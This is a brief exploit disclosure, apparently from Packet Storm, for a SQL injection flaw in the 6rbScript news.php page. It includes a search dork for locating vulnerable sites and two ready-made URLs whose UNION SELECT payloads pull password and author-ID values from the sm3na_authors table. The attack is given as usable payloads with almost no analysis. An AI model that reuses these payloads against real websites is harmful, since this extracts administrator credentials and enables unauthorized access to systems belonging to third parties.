6rbScript suffers from a remote SQL injection vulnerability in news.php.
4b1738ec234258ccc323697cd7b42fdf##########################################################
#
# 6rbScript SQL Injection Vulnerability
#
# by Hussin X
#
# Home: www.tryag.cc/cc
#
# darkangel_g85[at]Yahoo[DoT]com
#
# DoRK: Powered by 6rbScript
##########################################################
##########################################################
Exploit:
PWD
http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
USER
http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
###########################################################
Greetz: All IRAQI And all HACKER
###########################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!